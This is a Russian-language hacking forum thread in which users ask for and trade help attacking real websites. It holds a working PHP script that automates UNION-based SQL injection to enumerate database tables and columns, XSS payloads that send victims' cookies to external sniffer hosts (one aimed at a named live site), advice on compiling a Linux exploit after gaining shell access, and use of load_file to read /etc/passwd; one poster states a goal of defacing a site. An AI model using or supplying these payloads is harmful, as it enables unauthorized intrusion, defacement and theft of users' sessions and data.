я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий... з.ы. но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
Сам вчера распрашивал знакомых по дному вопросу... Кароче ответ таков: Мускул здесь нипричём, дело в скрипте, если скрипт не поддержует многостроковый вывод, то никак, но зато для автоматизации перебора через лимит написано множество скриптов. Вот один из них: PHP: <? #Скрипт для перебора значений limit в sql injection set_time_limit(0); error_reporting(0); #В примере: 0x7C - соответствует символу "|", вместе с символом разделителем 0x3a получается запрос, ограниченный "|:" и ":|" $n="|:"; #начало искомой $n2=":|"; #конец искомой $j=0; #парсить с $lim=0; #до (0 - если до конца) function get_page($url){ #получение страницы $link=parse_url($url); $host = $link['host']; $src = $link['path']; $src .= ($link['query'] > "")?"?".$link['query']:""; $sock = fsockopen ($host, 80); fputs ($sock, "GET /$sr<-b>c HTTP/1.0\r\nHost: $host\r\n\r\n"); $cont = ""; while (!feof ($sock)) { $cont .= fgets ($sock); } fclose ($sock); return $cont; } for($i=$j;($lim != 0) ? $i<$lim : 1 != 0;$i++){ #получение данных $url="http://www.site.com/products.php?category_id=-1+union+select+1,2,concat_ws(0x3a,0x7c,table_name,column_name,0x7c),4+from+information_schema.columns+limit+$i,1/*"; #ссылка $page=get_page($url); $page=strip_tags($page); $pos=stripos($page,$n); $pos2=stripos($page,$n2,($pos+1)); if($pos == ""){echo "\n Current value - $i"; break;} $page=substr($page,($pos+strlen($n)),($pos2-$pos-strlen($n2))); $page .="\n"; echo $page; $r=fopen('out.txt','a+'); #сохранение в файл fputs($r,$page); fclose($r); } ?> // Вроде бы правила ответа на вопрос не нарушел...
group_concat Но тоже частями, но побольше, побольше ЗЫЖ Для тех, кто думает, что через груп-конкат нельзя вывести всё абсолютно, вспомните про знаки ">" и "<" и подзапросы, и не парьте мне мозг своими оценками
Всем привет, есть эксплойт для линукса http://www.milw0rm.com/exploits/7405 Как его использовать? сохранять в текстовом файле? есть доступ через шелл на сайт, как вот использовать эксплойт ? куда загружать?
2 joomler Сохраняешь в файле с расширением blabla.c и компилируешь под linux-ом gcc -o blabla blabla.c тока енто ж вродь DoS експлоит он тебе root не даст
slider, это был ответ на другой вопрос, смотри внимательнее! Ответ был на вопрос: Что можно с этим сделать? http://qqqq.110mb.com/x.jpg как то так...
нашел на сайте вроде активную xss, в поисковике . никак не могу понять , kak применять ?делал все по forum.antichat.ru/thread20140.html а вот kak подставить к ссылке никак не понимаю. сайт не хочу пока что давать.
Если XSS активная - то не надо никакую ядовитую ссылку кидать, яваскрипт выполнится автоматически при заходе на страницу!
Saiga, если пасивка, то кидаешь с линком что то типа: <script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script> да в принципе если и активка, то этот вариант подойдёт цитата ниженаписанного: без линка сложно будет помочь... Иногда линк формируется примерно так: http://site.com/blablabla.php"><script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script> Ну это лишь один из случаев...
http://www.toidutare.ee//retsept.php?otsi=1 <scr_ipt>im*g=new Image();im*g.src="http://sniffer.xaknet.ru/userbars/img_4_551.gi*f?"+document.cookie;</scri_pt> что то такое ? но на сниффере , самого меня показывает )) это пассивка , спс за помощь
Привет всем ребята помогите Нашел сайтик что мне нужно! сделал sql-inj Узнал Версия версия СУБД (базы данных) - 5.0.45 пролистал все колонки но нигде не нашел упоминание о admin user Что сделал не так кто поможет? ,load_file(0x2f6574632f706173737764) load_file(/etc/passwd/) И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю